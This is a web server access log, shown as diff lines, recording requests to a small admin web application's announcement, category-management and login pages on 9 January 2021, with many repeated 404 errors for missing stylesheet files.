+[pid: 18965|app: -1|req: -1/656] 219.228.146.245 () {38 vars in 747 bytes} [Sat Jan 9 00:45:03 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/657] 219.228.146.245 () {38 vars in 823 bytes} [Sat Jan 9 00:45:03 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/658] 219.228.146.245 () {38 vars in 745 bytes} [Sat Jan 9 00:45:03 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/659] 219.228.146.245 () {38 vars in 819 bytes} [Sat Jan 9 00:45:03 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 447/660] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 448/661] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 449/662] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 450/663] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 451/664] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 452/665] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 453/666] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 454/667] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:45:04 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 455/668] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:45:04 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 456/669] 182.254.152.219 () {22 vars in 236 bytes} [Sat Jan 9 00:46:36 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1)
+Not Found: /manager/html
+[pid: 18965|app: 0|req: 457/670] 182.254.152.219 () {24 vars in 302 bytes} [Sat Jan 9 00:46:36 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 458/671] 47.242.91.138 () {40 vars in 888 bytes} [Sat Jan 9 00:49:28 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 459/672] 47.242.91.138 () {40 vars in 886 bytes} [Sat Jan 9 00:49:29 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 460/673] 47.242.91.138 () {40 vars in 888 bytes} [Sat Jan 9 00:49:30 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 461/674] 47.242.91.138 () {40 vars in 890 bytes} [Sat Jan 9 00:49:30 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 462/675] 47.242.91.138 () {38 vars in 819 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 463/676] 47.242.91.138 () {38 vars in 799 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 464/677] 47.242.91.138 () {38 vars in 819 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 465/678] 47.242.91.138 () {38 vars in 835 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 466/679] 47.242.91.138 () {38 vars in 831 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 467/680] 47.242.91.138 () {38 vars in 843 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 468/681] 47.242.91.138 () {40 vars in 890 bytes} [Sat Jan 9 00:49:31 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 469/682] 47.242.91.138 () {38 vars in 767 bytes} [Sat Jan 9 00:49:32 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 470/683] 47.242.91.138 () {38 vars in 765 bytes} [Sat Jan 9 00:49:33 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 471/684] 47.242.91.138 () {38 vars in 875 bytes} [Sat Jan 9 00:49:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 472/685] 219.228.146.245 () {48 vars in 976 bytes} [Sat Jan 9 00:56:35 2021] POST /announcement/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 473/686] 219.228.146.245 () {40 vars in 895 bytes} [Sat Jan 9 00:56:35 2021] GET /announcement/? => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 474/687] 219.228.146.245 () {40 vars in 894 bytes} [Sat Jan 9 00:56:35 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 475/688] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 476/689] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 477/690] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 478/691] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 479/692] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 480/693] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 481/694] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 482/695] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:36 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 483/696] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:36 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 484/697] 219.228.146.245 () {40 vars in 892 bytes} [Sat Jan 9 00:56:39 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 485/698] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 486/699] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 487/700] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 488/701] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 489/702] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 490/703] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 491/704] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 492/705] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:39 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 493/706] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:39 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 494/707] 219.228.146.245 () {48 vars in 972 bytes} [Sat Jan 9 00:56:46 2021] POST /kind-manage/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 495/708] 219.228.146.245 () {40 vars in 892 bytes} [Sat Jan 9 00:56:46 2021] GET /kind-manage/? => generated 11087 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 496/709] 219.228.146.245 () {40 vars in 891 bytes} [Sat Jan 9 00:56:46 2021] GET /kind-manage/ => generated 11087 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 497/710] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 498/711] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 499/712] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 500/713] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 501/714] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 502/715] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 503/716] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 504/717] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:46 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 505/718] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:46 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 506/719] 219.228.146.245 () {48 vars in 972 bytes} [Sat Jan 9 00:56:50 2021] POST /kind-manage/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 507/720] 219.228.146.245 () {40 vars in 892 bytes} [Sat Jan 9 00:56:50 2021] GET /kind-manage/? => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 508/721] 219.228.146.245 () {40 vars in 891 bytes} [Sat Jan 9 00:56:50 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 509/722] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 510/723] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 511/724] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 512/725] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 513/726] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 514/727] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 515/728] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 516/729] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:50 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 517/730] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:50 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 518/731] 219.228.146.245 () {40 vars in 889 bytes} [Sat Jan 9 00:56:53 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 519/732] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 520/733] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 521/734] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 522/735] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 523/736] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 524/737] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 525/738] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 526/739] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:53 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 527/740] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:53 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 528/741] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 00:57:00 2021] GET /single/7/ => generated 8331 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 529/742] 219.228.146.245 () {38 vars in 825 bytes} [Sat Jan 9 00:57:15 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 530/743] 219.228.146.245 () {48 vars in 954 bytes} [Sat Jan 9 00:57:18 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 531/744] 219.228.146.245 () {40 vars in 871 bytes} [Sat Jan 9 00:57:18 2021] GET /home/ => generated 8646 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 532/745] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:57:23 2021] GET /single-an-1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 533/746] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 00:57:23 2021] GET /single-an-1/ => generated 3045 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 534/747] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 00:59:11 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 535/748] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 01:36:40 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 536/749] 219.228.146.62 () {36 vars in 716 bytes} [Sat Jan 9 01:55:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/750] 219.228.146.62 () {38 vars in 754 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/751] 219.228.146.62 () {38 vars in 776 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/752] 219.228.146.62 () {38 vars in 758 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
